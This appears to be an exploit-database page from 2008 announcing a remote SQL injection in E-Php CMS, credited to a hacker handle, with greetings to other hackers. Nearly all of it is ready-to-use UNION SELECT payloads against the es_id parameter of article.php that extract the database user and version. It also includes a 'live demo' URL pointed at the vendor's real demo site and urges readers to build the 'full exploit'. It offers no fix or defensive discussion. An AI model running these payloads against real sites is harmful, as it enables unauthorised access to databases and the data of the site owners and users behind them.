[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability
# Published : 2008-09-18
# Author : HaCkeR_EgY
# Previous Title : PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability
# Next Title : addalink <= 4 (category_id) Remote SQL Injection Vulnerability


############################################################
############# E-Php Content Management System ######################
## HaCker_Egy ;
## Contact : hacker_egy@hotmail.com
## Home : pal-hacker.com & atsdp.com
===============================================
# Script :  E-Php Content Management System
# Download : http://www.ephpscripts.com
===============================================
# Exploit :
           ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
         
     ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
    
# live Demo :
             
    ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*
   
## Note : use your mind to get Full exploit D: 
   
===============================================================
## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el arab
===============================================================

# www.Syue.com [2008-09-18]